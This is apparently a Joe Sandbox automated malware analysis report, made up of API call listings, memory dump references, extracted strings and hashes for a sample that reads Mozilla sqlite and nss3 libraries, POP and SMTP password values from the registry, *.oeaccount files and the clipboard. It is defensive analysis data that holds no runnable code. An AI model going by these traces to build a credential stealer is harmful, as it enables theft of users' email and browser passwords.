                  • GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID:
                  • API String ID: 145871493-0
                  • Opcode ID: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
                  • Instruction ID: a05247dfa83e1e5897bdf1ebfda0bf15c3173a66790072ff667e3a7d903ceddc
                  • Opcode Fuzzy Hash: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
                  • Instruction Fuzzy Hash: C6F0E5B46007038BD720DF39D849797B7E8AF45701F00853EF166E3185E778A641C758
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID:
                  • API String ID: 1865533344-0
                  • Opcode ID: d4079c97fea363649fd402a4fcc1020c1411aa7f5a7ac2feb31ee8da9293c8e4
                  • Instruction ID: 98d015050fab8b107beb11645b231ec9ddeee47dde9a658ed6f4cbb8f47cff71
                  • Opcode Fuzzy Hash: d4079c97fea363649fd402a4fcc1020c1411aa7f5a7ac2feb31ee8da9293c8e4
                  • Instruction Fuzzy Hash: E1117C31900609EFCF11AF90C804AEE3BB1FF08320F10C16AF8156B2A0C7799A51DF69
                  APIs
                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 0040F1A6
                    • Part of subcall function 0040F097: memset.MSVCRT ref: 0040F0B5
                    • Part of subcall function 0040F097: _itoa.MSVCRT ref: 0040F0CC
                    • Part of subcall function 0040F097: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040F0DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: PrivateProfile$StringWrite_itoamemset
                  • String ID:
                  • API String ID: 4165544737-0
                  • Opcode ID: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
                  • Instruction ID: ef80bc42b69c7626de0f5e8b39bb4bd6d74a87ec05759e80c101291bc1ad5009
                  • Opcode Fuzzy Hash: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
                  • Instruction Fuzzy Hash: 22E0B632004209FBCF125F90EC01AA93FA6FF04315F148479F95C14961E33295B4AB84
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: b09b4f46af4af4ec09f127408c7b8750a63144aa3ee2ed7c4ad6510036d3ab84
                  • Instruction ID: ac6048c5c4f70b5451fe2278e29ff5f30c102ff2b03874ea15ff7294586fe6d8
                  • Opcode Fuzzy Hash: b09b4f46af4af4ec09f127408c7b8750a63144aa3ee2ed7c4ad6510036d3ab84
                  • Instruction Fuzzy Hash: 99E08C31E04108DBCF10ABA189465DE77B2AB04325F10C1A6E961772E1C3781E41CF69
                  APIs
                  • FreeLibrary.KERNELBASE(?,?), ref: 00404810
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
                  • Instruction ID: a9857fde68bfdf8991c7705c8330266d98638ef7b5ff2aef664b3e01c595234a
                  • Opcode Fuzzy Hash: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
                  • Instruction Fuzzy Hash: 54D012B61003118FDB209F14EC0CBE133ECAF40312F15C4B9E951A7156C3349540CA58
                  APIs
                  • EnumResourceNamesA.KERNEL32(?,?,0040F37C,00000000), ref: 0040F411
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: EnumNamesResource
                  • String ID:
                  • API String ID: 3334572018-0
                  • Opcode ID: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
                  • Instruction ID: fad5876d7f8aa1560905c766ba53a11d3010bfcf0403834e812c2ac38a9eeaed
                  • Opcode Fuzzy Hash: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
                  • Instruction Fuzzy Hash: 88C09B31594341D7C711DF208C05F1BFEE5BB5C702F108C3D7151D40E4C77180189615
                  APIs
                  • FindClose.KERNELBASE(?,00406FDF,?,?,00000000,?,00411327,*.oeaccount,0041141B,?,00000104), ref: 004070CF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
                  • Instruction ID: fb6f9d5761a39194e530e87d941626cbb459cc8d01e30c2ad93bf7984ca40ca8
                  • Opcode Fuzzy Hash: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
                  • Instruction Fuzzy Hash: 77C09230510A01ABD23C5F389C5A46A7BA0AF593323B48F6CE0F3D24F0E73899868A04
                  APIs
                  • FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
                  • Instruction ID: 3414d520a0ca87f174e03c7aae78275fe345844bef97b548c291c08909f1245b
                  • Opcode Fuzzy Hash: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
                  • Instruction Fuzzy Hash: 62C04C31210702DBEB218B12C849753B7E8AB40317F40CC68945695494D77DE454CE18
                  APIs
                  • GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
                  • Instruction ID: f305466360af1034a225c08a34d2ddc6697937c487c9f6746c0aa1a011dcbbf5
                  • Opcode Fuzzy Hash: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
                  • Instruction Fuzzy Hash: CCB012753100005BCB080B349C4A0CD35506F446327204B3CB033C00F0D720CE60BA00
                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
                  • Instruction ID: 6c28280414aaf847a098fae787e0885161fd0282473b9be1e1f1fd42ed515737
                  • Opcode Fuzzy Hash: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
                  • Instruction Fuzzy Hash: 41C09B35544301FFDE118F40ED05F09BFA1AB88B05F008414B244240B1C2718414EB17
                  APIs
                  • DefWindowProcA.USER32(?,?,?,?,004019D4,?,?,?), ref: 0040181A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcWindow
                  • String ID:
                  • API String ID: 181713994-0
                  • Opcode ID: 41d0657a6ca65bec123c94d32be3811cc646216fbedcb2d1f0efeb7b09bfaf38
                  • Instruction ID: fb3ddee3b07d71e7bca7acd0b5fe8f04ac65e6ee1acd5581bfa893650ac4d969
                  • Opcode Fuzzy Hash: 41d0657a6ca65bec123c94d32be3811cc646216fbedcb2d1f0efeb7b09bfaf38
                  • Instruction Fuzzy Hash: 5CC00C76508100FFCE425F50DD04D4ABB66AB95315F15C469F19944135C7738561EB15
                  APIs
                  • PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040AEC6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 60ea05e37354249f88e66d0bcdee44a25c2cc333a442d33a2d3445e2a47da255
                  • Instruction ID: ea89e85155476ffbf5940f574962b467ecbbbfdc4f529f07fe84d42430be8e09
                  • Opcode Fuzzy Hash: 60ea05e37354249f88e66d0bcdee44a25c2cc333a442d33a2d3445e2a47da255
                  • Instruction Fuzzy Hash: 11B002B07C4704BAED515F559D0EFD575515750B05F1540B073457D0F19ED11591950C
                  APIs
                  • memset.MSVCRT ref: 0040FCE5
                  • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040FCFC
                  • memset.MSVCRT ref: 0040FD29
                  • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD3C
                  • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD4D
                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD73
                  • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD84
                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDAB
                  • strcat.MSVCRT(?,\nss3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDBC
                  • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDCB
                  • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDE2
                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDF0
                  • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDFE
                  • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040FE1E
                  • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040FE2A
                  • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040FE37
                  • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040FE44
                  • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040FE51
                  • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040FE5E
                  • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040FE6B
                  • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040FE78
                  • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040FE85
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$strcpy$strcat$HandleLibraryLoadModulememset
                  • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                  • API String ID: 2571629209-2385123308
                  • Opcode ID: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
                  • Instruction ID: c8562112cbf9eae777f2394b99ada5fc335e217e34df457794dbf1c8b1b14659
                  • Opcode Fuzzy Hash: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
                  • Instruction Fuzzy Hash: 86516371900308AECB30EFA1DD45ECB7BF8AF58704F10497BE649E2641E678E6858F58
                  APIs
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                    • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
                    • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                  • strcpy.MSVCRT(?,?), ref: 00402E8B
                  • strcpy.MSVCRT(?,?,?,?), ref: 00402E9E
                  • strcpy.MSVCRT(?,?), ref: 00402F2B
                  • strcpy.MSVCRT(?,?,?,?), ref: 00402F38
                  • RegCloseKey.ADVAPI32(?), ref: 00402F92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcpy$QueryValue$CloseOpen
                  • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                  • API String ID: 4127491968-1534328989
                  • Opcode ID: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
                  • Instruction ID: 3eb728c69d877055b887914c3e29035f7ad0c3b4bfdbdde50966da93315596c3
                  • Opcode Fuzzy Hash: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
                  • Instruction Fuzzy Hash: 315139B1910218BEDB21EF51CD06BDE777CAF04304F1081B7BA08B6191E7789B989F58
                  APIs
                  • EmptyClipboard.USER32 ref: 00405FDA
                    • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FF7
                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406008
                  • GlobalLock.KERNEL32(00000000), ref: 00406015
                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406028
                  • GlobalUnlock.KERNEL32(00000000), ref: 00406037
                  • SetClipboardData.USER32(00000001,00000000), ref: 00406040
                  • GetLastError.KERNEL32 ref: 00406048
                  • CloseHandle.KERNEL32(?), ref: 00406054
                  • GetLastError.KERNEL32 ref: 0040605F
                  • CloseClipboard.USER32 ref: 00406068
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                  • String ID:
                  • API String ID: 3604893535-0
                  • Opcode ID: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
                  • Instruction ID: 46ab690def339a2f00972c0b4152e32a3d13c207705114ffa6be22e44c23a91c
                  • Opcode Fuzzy Hash: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
                  • Instruction Fuzzy Hash: A0112875544205BFDB10AFA4AC48B9A7FB8EB08316F118176F906E22A1DB748A44CA69
                  APIs
                  • EmptyClipboard.USER32 ref: 0040607B
                  • strlen.MSVCRT ref: 00406088
                  • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AFC1,?), ref: 00406097
                  • GlobalLock.KERNEL32(00000000,?,?,?,?,0040AFC1,?), ref: 004060A4
                  • memcpy.MSVCRT ref: 004060AD
                  • GlobalUnlock.KERNEL32(00000000), ref: 004060B6
                  • SetClipboardData.USER32(00000001,00000000), ref: 004060BF
                  • CloseClipboard.USER32 ref: 004060CF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                  • String ID:
                  • API String ID: 3116012682-0
                  • Opcode ID: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                  • Instruction ID: d09f43d2fefddb7d7ea69405cde3b0bd2fff4912bca4764858ce7f0ae225efb5
                  • Opcode Fuzzy Hash: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                  • Instruction Fuzzy Hash: 09F090371402296BC2102FA4BC4CE9B7FACDF88B56B058139FA0AD2251DE74894486A9
                  APIs
                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040ADBE
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ADD0
                  • GetTempFileNameA.KERNEL32(?,0041444C,00000000,?), ref: 0040ADF2
                  • OpenClipboard.USER32(?), ref: 0040AE12
                  • GetLastError.KERNEL32 ref: 0040AE2B
                  • DeleteFileA.KERNEL32(00000000), ref: 0040AE48
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                  • String ID:
                  • API String ID: 2014771361-0
                  • Opcode ID: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                  • Instruction ID: 7dfed4210218cbe3633ab85fc006b2e48c808a0cdacf0b0ca9692cf87dba871e
                  • Opcode Fuzzy Hash: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                  • Instruction Fuzzy Hash: 071165725443186BDB209B61DC49FCB7BBCAF14706F0441B6F689E2091EB78DAC48B69
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: PrivateProfileString_mbscmpstrlen
                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                  • API String ID: 3963849919-1658304561
                  • Opcode ID: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
                  • Instruction ID: ad4fe9f44f4ec6704836124f0b121ca839780027ba1e1250375890495da90f14
                  • Opcode Fuzzy Hash: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
                  • Instruction Fuzzy Hash: F421BEB1C0022C6EDB61EF118D86FED7B7C9F45705F4000ABAA48B6092DB7C5BC59E59
                  APIs
                  • GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
